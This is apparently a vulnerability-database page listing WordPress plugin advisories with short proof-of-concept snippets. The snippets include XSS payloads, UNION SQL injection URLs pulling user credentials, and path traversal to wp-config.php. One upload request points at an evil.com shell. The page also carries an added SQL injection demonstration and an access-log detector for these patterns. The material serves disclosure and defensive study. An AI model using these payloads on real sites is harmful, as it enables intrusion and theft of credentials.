Recent Posts Widget Extended <= 0.9.9.3 - Authenticated XSS (multisite)
XSS in the Recent Posts Widget Extended plugin allows a single-site administrator to change the network administrator's password via the simple CSRF described in the PoC field. This vulnerability is currently unpatched. 1. Log in as a single-site administrator 2. Add the Recent Posts Extended widget to some widget area 3. Add...
SEO Redirection < 2.9 - Authenticated Reflected Cross-Site Scripting (XSS)
The plugin was affected by an Authenticated Reflected Cross-Site Scripting (XSS) vulnerability in its settings page, via the search GET parameter: https://example.com/wp-admin/options-general.php?page=seo-redirection.php&tab=posts&search=%22+onmouseover%3Dalert%281%29+%3E...
recent-backups <= 0.7 - Remote File Download
The plugin is still affected and has been closed. The code in download-file.php neither verifies that the user is logged in nor restricts which files can be downloaded. This vulnerability can be used to download sensitive system files, such as the Linux passwd file. $ curl -v...
Hide My WP <= 4.51.1 - Stored Cross-Site Scripting (XSS)
An attacker can make a fake attack attempt carrying a JavaScript payload, which will be logged by the plugin, resulting in XSS. The attacker can also spoof their IP address in the logs by setting the X-FORWARDED-FOR header. curl --referer ' // :; ;' --header 'X-FORWARDED-FOR: 8.8.8.8'...
WP-CopyProtect <= 3.0.0 - CSRF & Stored Cross-Site Scripting (XSS)
The WP-CopyProtect (Protect your blog posts) plugin for WordPress is vulnerable to a Persistent XSS attack on the settings screen, due to a lack of sanitisation of user input and the lack of a Cross-Site Request Forgery (CSRF) nonce. alert1'/ document.getElementById"form".submit;...
Anti-Malware & Brute-Force Security by ELI <= 4.15.17 - Multiple Reflected XSS
The Anti-Malware Security and Brute-Force Firewall WordPress plugin was affected by multiple Reflected XSS vulnerabilities. http://localhost/wordpress/wp-admin/admin.php?page=GOTMLS-settings&GOTMLSmsg=xsstestalert1...
Freshmail for WordPress <= 1.5.8 - Unauthenticated SQL Injection
There is an unauthenticated SQL injection vulnerability in the "Subscribe to our newsletter" forms shown to web visitors, in the POST parameter fmformid. POST /wp-admin/admin-ajax.php HTTP/1.1 Host: X-Requested-With: XMLHttpRequest ... Cookie: wordpressf30...
Ultimate Product Catalogue <= 3.1.2 - Unauthenticated SQL Injection
Unauthenticated SQL injection in the AJAX call the plugin uses to count how many times visitors have viewed a product. The vulnerable POST parameter is "ItemID". Vulnerable code: in file Functions/ProcessAjax.php line 67: ... $ItemID = $_POST['ItemID']; $Item = $wpdb->get_row("SELECT ItemViews...
WP-Mon - Arbitrary File Download
The wp-mon WordPress plugin was affected by an Arbitrary File Download security vulnerability. As seen in access logs: http://www.example.com/wp-content/plugins/wp-mon/assets/download.php?type=octet/stream&path=../../../../&name=wp-config.php...
Category Page Icons <= 0.9.1 - Arbitrary File Upload/Deletion via Path Traversal
v0.9.2 added a check that prevents direct access to the affected file; however, the path traversal itself was not fixed. The plugin has been closed in the repository. Choose File to upload : Directory :...
Gallery 3.06 - Unauthenticated File Upload PHP Code Execution
The Gallery by BestWebSoft WordPress plugin was affected by an Unauthenticated File Upload PHP Code Execution security vulnerability. The vulnerable file was: http://www.example.com/wp-content/plugins/gallery-plugin/upload/php.php...
15Zine < 3.3.0 - Reflected Cross-Site Scripting
The theme does not sanitise and escape the cbi parameter before outputting it back in the response via the cbsa AJAX action, leading to a Reflected Cross-Site Scripting: https://example.com/wp-admin/admin-ajax.php?action=cbsa&cbi=alert/XSS/;...
Rank Math 0.9~1.0.42.1 - Missing Access Controls to Disable Competitor Plugins
Missing access controls on the GET requests that deactivate competitors' plugins. This could allow any authenticated user, such as a subscriber, to deactivate competing SEO and sitemap plugins. The attack could also be performed via CSRF...
ThemeGrill Demo Importer < 1.6.3 - Auth Bypass & Database Wipe
There is a vulnerability that allows any unauthenticated user to reset the entire database to its default state, after which they are automatically logged in as an administrator. Edit WPScanTeam: v1.6.2 was released with an insufficient fix, allowing attackers to still exploit the issue using a CSR...
Featured Image from URL <= 2.7.7 - Missing Access Controls on REST routes
The REST routes are missing permission callbacks, allowing unauthenticated/unauthorised users to call them. Affected endpoints: - wp-json/featured-image-from-url/v2/enablefakeapi - wp-json/featured-image-from-url/v2/disablefakeapi - wp-json/featured-image-from-url/v2/nonefakeapi -...
Groundhogg <= 2.0.8.1 - Authenticated Reflected XSS
The WordPress Groundhogg plugin with a version lower than 2.0.8.1 is affected by an authenticated Reflected Cross-Site Scripting (XSS) vulnerability. Exploit Title: WordPress Groundhogg /wp-admin/admin.php?page=ghbulkjobs&action=ghexportcontactsalert1 - The response will contain: bulkaction:...
Portrait-Archiv.com Photostore <= 3.1 - Unauthenticated Reflected XSS
The 'pDetails' GET parameter of js/imageDetails.php was vulnerable to an unauthenticated reflected XSS attack. http://www.example.com/wp-content/plugins/portrait-archiv-shop/js/imageDetails.php?pDetails=;;alert"XSS"...
Hybrid Composer <= 1.4.6 - Unauthenticated Options Update
This plugin has a function to update WordPress options via AJAX, and it is registered with the following: add_action('wp_ajax_nopriv_hc_ajax_save_option', 'hc_ajax_save_option'); The wp_ajax_nopriv_ prefix means the handler does not require authentication, so it is exploitable by anyone on the internet. I've already spoken to the plugin author about...
WP Slimstat <= 4.8.3 - CSRF to Stored XSS and Setting Updates
The lack of a CSRF check and of sanitisation in the updatesettings function can lead to settings updates as well as Stored XSS issues. /wp-admin/admin.php?page=slimconfig&tab=1" method="POST" ' /...
Share This Image <= 1.19 - Stored XSS
Stored XSS occurs when a web application gathers input from a user, which might be malicious, and then stores that input in a data store for later use. Here the stored input is not correctly filtered. Go to the Share This Image menu, and put " in the Selector field from the "What to Share" secti...
Breadcrumb NavXT <= 6.1.0 - Username Disclosure via REST API
The Breadcrumb NavXT WordPress plugin was affected by a Username Disclosure via REST API vulnerability. http://www.example.com/wp-json/bcn/v1/author/1...
Profile Builder < 2.5.8 - Authenticated Stored Cross-Site Scripting (XSS)
Stored Cross-Site Scripting (XSS) in the "minimum password length" field. history.pushState('', '', '/')...
ByREV WP-PICShield - Cross-Site Request Forgery (CSRF)
The ByREV WP-PICShield WordPress plugin is vulnerable to CSRF. When updating the plugin options, several parameters in the issued POST request are written directly to the .htaccess file within the WordPress root directory. An attacker may be able to insert arbitrary lines into the .htaccess file,...
WP Private Messages 1.0.1 – Authenticated SQL Injection
Required access: registered user. $_GET['id'] is not escaped, and the URL is accessible to every registered user. http://www.example.com/wp-admin/users.php?page=wp-private-messages%2Fwpuprivatemessages.php&wpu=read&id=0+UNION+SELECT+1,2,2,name,slug,6,7,8,9,10,11,12+FROM+wp_terms+WHERE++term_id%3D1&r=recieve...
Answer My Question 1.3 - SQL Injection
$_POST['id'] is not escaped, and the URL is accessible to any user. Vulnerable URL: http://target/wp-content/plugins/answer-my-question/modal.php...
BBS e-Franchise 1.1.1 - Unauthenticated SQL Injection
$_GET['uid'] is not escaped, and the URL is accessible to any user. You will have to find a post or page that uses the plugin's shortcode...
FireStorm Shopping Cart eCommerce Plugin 2.07.02 - Authenticated SQL Injection
$_POST['pid'] is not escaped. The URL is accessible to administrator users. Affected URL: http://localhost:1406/wp/wp-admin/admin.php?page=fssc-products=general=edit=0=0 http://target/wp-admin/admin.php?page=fssc-products&fp=general&f=edit&cid=0&pid=0+UNION+SELECT+name+FROM+wp_terms+WHERE+term_id=1...
Appointment Calendar - Stored Cross-Site Scripting (XSS)
When a user submits appointment data there is no validation, which leads to stored XSS. curl 'Path to page where appointments calendar short-code is used' -H 'Accept: text/html, */*; q=0.01' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.5' -H 'Content-Type:...
Real3D FlipBook <= 2.8 - Multiple Vulnerabilities
List of vulnerabilities: - Delete any file or directory from the server (Unauthenticated) - Upload images in the root directory (Unauthenticated) - Cross-Site Scripting (XSS) + PoC/Exploit CodeCanyon Real3D FlipBook WordPress Plugin + http://codecanyon.net/item/real3d-flipbook-wordpress-plugin/6942587 +...
CM Ad Changer <= 1.7.7 - Stored Cross-Site Scripting (XSS)
A Stored Cross-Site Scripting issue was reported by the author to CM Ad Plugins, under which an unprivileged user can trigger a Stored XSS to perform malicious actions, or any attacker could send a crafted link (CSRF) that triggers the Stored XSS. 1. Go to CM Ad changers - Campaigns 2. Create a Campaign...
The Events Calendar <= 4.1.1 - Open Redirect
The problem is located in the "tribe-bar-view" parameter that can be used to redirect a user to an arbitrary website. Timeline 2016-04-04 : Initial contact with Modern Tribe 2016-04-05 : Modern Tribe confirms the report 2016-04-07 : Modern Tribe publishes a new version 4.1.1.1 that resolves the...
WP Google Map Plugin < 3.0.0 - CSRF to Authenticated Cross-Site Scripting (XSS)
The lack of CSRF protection could allow attackers to perform an XSS attack against logged-in administrators. ' / ' /...
Download Manager <= 2.7.94 - Authenticated Stored XSS
The stored XSS vulnerability allows any authenticated user to inject malicious code via the name of an uploaded file. Example: .jpg The vulnerability exists because the file name is not properly sanitised, which can lead to malicious code injection that is executed in the target's browser...
Users to CSV <= 1.4.5 - Cross-Site Request Forgery (CSRF)
The users-to-csv WordPress plugin was affected by a Cross-Site Request Forgery (CSRF) vulnerability. http://www.example.com/wp-admin/users.php?page=users2csv.php&csv=true&table=users http://www.example.com/wp-admin/users.php?page=users2csv.php&csv=true&table=comments...
WordPress 3.5-3.7.1 - XML-RPC Denial of Service
…...
KenBurner Slider - Unauthenticated Arbitrary File Download
The WordPress plugin KenBurner Slider suffers from an Arbitrary File Download vulnerability, which could allow an attacker to download the wp-config.php file and others. This issue has been spotted being exploited in the wild...
BSK PDF Manager < 2.9.1 - Authenticated Stored Cross-Site Scripting (XSS)
The plugin does not sanitise the view and cattitle POST parameters when creating or editing a category via /wp-admin/admin.php?page=bsk-pdf-manager, allowing authenticated users with a role as low as editor to set an XSS payload which will be triggered in the Categories list...
Findgo - Directory Listing < 1.3.32 - Unauthenticated Reflected and Authenticated Stored XSS
Multiple Cross-Site Scripting (XSS) vulnerabilities were discovered in the «Findgo - Directory Listing WordPress Theme», tested version: v1.3.30. PoC Unauthenticated Reflected XSS: https://demoapus.com/findgo/listings/?searchdistance=%22%3E%3Cimg%20src=x%20onerror=alertXSS%3E PoC Authenticated...
Social Metrics Tracker <= 1.6.8 - Unauthorised Data Export
The lack of proper authorisation when exporting data from the plugin could allow unauthenticated users to obtain information about the posts and pages of the blog, including their authors' usernames and email addresses. The plugin is still affected and has been closed. curl...
Rencontre < 3.2 - Authenticated Stored XSS via textmail & textanniv Parameters
An authenticated persistent cross-site scripting vulnerability has been found in the web interface of the plugin that allows arbitrary HTML/script code to be executed in the victim's browser when they visit the web site. Affected Version: alert'XSS'// Encoded-Payload:...
Watu Quizz <= 3.1.2.5 - Reflected XSS via question-form.html.php
The Watu Quiz WordPress plugin was affected by a Reflected XSS vulnerability via question-form.html.php. /wp-admin/admin.php?page=watuquestion&question=1&action=edit&quiz=1"...
Like Button Rating < 2.5.4 - Unauthenticated Arbitrary Blog Settings Change
In the init action, this plugin checked whether $_POST['likebtn_import_config'] is empty. If it is not empty, it base64-decodes the string, parses it as JSON, and starts changing options. This could allow attackers to change blog settings such as the Site Title. The below form will set the “Site...
DSubscribers <= 1.2 - Authenticated SQL Injection
The DSubscribers WordPress plugin was affected by an Authenticated SQL Injection vulnerability. Proof of Concept: 1 – Log in with an admin user: 2 – Attack URL: http://target/wp-admin/admin.php?page=dsubscribers&action=edit&dsubscribers=0 UNION SELECT 1,2,CONCAT(user_login,char(58),user_pass) FROM...
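The injection pattern behind this entry and the other unescaped-parameter entries on this page (the $_POST['ItemID'] query in Ultimate Product Catalogue, the id/uid/pid parameters in WP Private Messages, BBS e-Franchise and FireStorm) is the same: an integer read straight from the request is interpolated into the SQL string, so a value such as "0 UNION SELECT ..." reads rows from any table. The Python below is an added example that models that pattern with sqlite3; it is not the plugins' PHP, and the products and wp_users tables are constructed stand-ins. The "fixed" function stands in for $wpdb->prepare() with a %d placeholder, which is the usual remediation for this class of bug in WordPress plugins.

```python
"""Model of the unescaped-integer SQL injection pattern that recurs in the
advisories on this page, with the UNION-based extraction the PoC URLs use.
Added example (Python + sqlite3), not the plugins' code; all data is constructed.
"""
import sqlite3


def make_db():
    """In-memory schema: a product table plus a wp_users-like credential table."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, views INTEGER);
        INSERT INTO products VALUES (1, 'Widget', 7);
        CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
        INSERT INTO wp_users VALUES (1, 'admin', '$P$BconstructedPhpassHash');
    """)
    return db


def product_views_vulnerable(db, item_id):
    """Equivalent of  $wpdb->get_row("SELECT ... WHERE id = $ItemID")  where
    $ItemID = $_POST['ItemID'] is interpolated without escaping or casting."""
    sql = f"SELECT name, views FROM products WHERE id = {item_id}"
    return db.execute(sql).fetchone()


def product_views_fixed(db, item_id):
    """Equivalent of  $wpdb->get_row($wpdb->prepare("... WHERE id = %d", $ItemID)).
    %d casts with intval() in PHP (giving 0 for the payload, hence no row); this
    model rejects anything that is not an integer outright and additionally binds
    the value as a parameter so it can never be parsed as SQL."""
    try:
        item_id = int(item_id)
    except (TypeError, ValueError):
        return None
    return db.execute(
        "SELECT name, views FROM products WHERE id = ?", (item_id,)
    ).fetchone()


# The same shape as the PoC payloads on this page: a zero that matches nothing,
# then a UNION whose column count equals the original SELECT's.
PAYLOAD = "0 UNION SELECT user_login, user_pass FROM wp_users WHERE ID = 1"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, id=1     :", product_views_vulnerable(db, "1"))
    print("vulnerable, payload  :", product_views_vulnerable(db, PAYLOAD))
    print("fixed, id=1          :", product_views_fixed(db, "1"))
    print("fixed, payload       :", product_views_fixed(db, PAYLOAD))
```

The UNION only works because the attacker can pick a column count matching the original query (two here), which is why the real PoCs on this page carry runs of 1,2,3,... placeholders until the count lines up.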
Tribulant Newsletters <= 4.6.4.2 – Multiple Vulnerabilities
The Newsletters WordPress plugin was affected by multiple security vulnerabilities. 3.1 File disclosure. Vulnerable URL: http://vulnerablesite.com/wp-admin/admin.php?page=newslettershistory&wpmlmethod=exportdownload&file=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cWINDOWS%5cwin.ini 3.2 Cross-Site...
Calendar by WD <= 1.5.51 - Authenticated SQL injection
http://www.defensecode.com/advisories/DC-2017-01-017WordPressSpiderEventCalendarPluginAdvisory.pdf Vulnerable POST URL: http://www.vulnerablesite.com/wp-admin/admin.php?page=SpiderCalendar&task=showmanageevent&calendarid=1 Vulnerable POST Body:...
WordPress Facebook <= 1.0.13 - Authenticated SQL Injection
http://www.defensecode.com/advisories/DC-2017-04-011WordPressFacebookPluginAdvisory.pdf Vulnerable POST URL: http://vulnerablesite.com/wp-admin/admin.php?page=SpiderFacebookmanage Vulnerable POST Body: searcheventsbytitle=&pagenumber=1&serchornot=&ascordesc=1&orderby=type AND SELECT FROM...
W3 Total Cache <= 0.9.4.1 - Authenticated Reflected Cross-Site Scripting (XSS)
The W3 Total Cache WordPress plugin was affected by an Authenticated Reflected Cross-Site Scripting (XSS) vulnerability...
WP Mobile Detector <= 3.5 - Arbitrary File Upload
The wp-mobile-detector WordPress plugin was affected by an Arbitrary File Upload security vulnerability. As seen in access logs: http://www.example.com/wp-content/plugins/wp-mobile-detector/resize.php?src=https://www.evil.com/shell.php...
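The exploitation patterns in the PoC URLs above are easy to pick out of web server access logs: directory traversal in a file parameter (recent-backups, WP-Mon, KenBurner Slider, Tribulant Newsletters, with the latter using backslashes encoded as %5c), a remote URL handed to a file parameter (WP Mobile Detector resize.php), and calls to REST routes that shipped without a permission callback (Featured Image from URL). The Python below is an added example and not code from WPScan or any of the plugins; the log lines are constructed, and the set of parameter names it watches is an assumption drawn from the PoC URLs on this page.

```python
"""Flag access-log requests matching the exploitation patterns shown on this
page.  Added example; the sample log lines are constructed, not from a real
server, and FILE_PARAMS / NOPRIV_REST_PREFIXES are assumptions taken from
the PoC URLs in the advisories above.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines in combined log format (Apache/nginx).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2020:12:00:01 +0000] "GET /wp-content/plugins/wp-mon/assets/download.php?type=octet/stream&path=../../../../&name=wp-config.php HTTP/1.1" 200 2913 "-" "curl/7.64.1"
203.0.113.5 - - [10/Mar/2020:12:00:02 +0000] "GET /wp-admin/admin.php?page=newslettershistory&wpmlmethod=exportdownload&file=..%5c..%5c..%5cWINDOWS%5cwin.ini HTTP/1.1" 200 403 "-" "curl/7.64.1"
198.51.100.7 - - [10/Mar/2020:12:00:03 +0000] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=https://www.evil.com/shell.php HTTP/1.1" 200 11 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2020:12:00:04 +0000] "POST /wp-json/featured-image-from-url/v2/enablefakeapi HTTP/1.1" 200 2 "-" "python-requests/2.22"
192.0.2.9 - - [10/Mar/2020:12:00:05 +0000] "GET /wp-content/plugins/wp-mon/assets/download.php?type=octet/stream&path=exports/&name=report.csv HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2020:12:00:06 +0000] "GET /wp-content/plugins/wp-mon/assets/download.php?type=octet/stream&path=%252e%252e%252f%252e%252e%252f&name=wp-config.php HTTP/1.1" 200 2913 "-" "curl/7.64.1"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# ".." as a whole path component, after normalising backslashes to slashes.
TRAVERSAL_RE = re.compile(r'(^|/)\.\.(/|$)')
SCHEME_RE = re.compile(r'^(https?|ftp|php|data):', re.I)

# Assumed: query parameters that carry a file path in the PoC URLs on this page.
FILE_PARAMS = {"path", "name", "file", "src", "filename"}
# Assumed: REST route prefixes the Featured Image from URL advisory lists.
NOPRIV_REST_PREFIXES = ("/wp-json/featured-image-from-url/v2/",)


def decode_fully(value, rounds=3):
    """Percent-decode repeatedly (catches %252e double encoding) and fold
    backslashes into slashes so ..%5c.. is seen as ../.. ."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/")


def classify(target):
    """Return the list of finding tags for one request target (path + query)."""
    parts = urlsplit(target)
    findings = []
    for key, raw in parse_qsl(parts.query, keep_blank_values=True):
        if key not in FILE_PARAMS:
            continue
        value = decode_fully(raw)
        if TRAVERSAL_RE.search(value):
            findings.append(f"path-traversal:{key}")
        if SCHEME_RE.match(value):
            findings.append(f"remote-url:{key}")
    if parts.path.startswith(NOPRIV_REST_PREFIXES):
        findings.append("unauth-rest-route")
    return findings


def scan_log(text):
    """Return (ip, method, target, status, findings) for every request that
    triggers at least one rule, in log order."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = classify(m["target"])
        if findings:
            hits.append((m["ip"], m["method"], m["target"], int(m["status"]), findings))
    return hits


if __name__ == "__main__":
    for ip, method, target, status, findings in scan_log(SAMPLE_LOG):
        print(f"{ip} {method} {status} {','.join(findings)} {target}")
```

A 200 status on a traversal hit is the line worth escalating: for download endpoints it usually means the file was served. The rules deliberately decode more than once, since a single unquote() would miss the %252e form on the last sample line.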
Anti-Malware Security & Brute-Force Firewall <= 4.15.42 - XSS & CSRF
The Anti-Malware Security and Brute-Force Firewall WordPress plugin was affected by XSS and CSRF vulnerabilities. An XSS vulnerability in https://wordpress.org/plugins/gotmls/ has been identified. While I scanned a site with that plugin, I had a file named '".png and it was skipped, but the result was...
Commentator <= 2.5.2 - Reflected Cross-Site Scripting (XSS)
The commentator WordPress plugin was affected by a Reflected Cross-Site Scripting (XSS) vulnerability. http://www.example.com/wp-admin/admin-ajax.php?action=commentatorsocialsignin&provider=facebook"...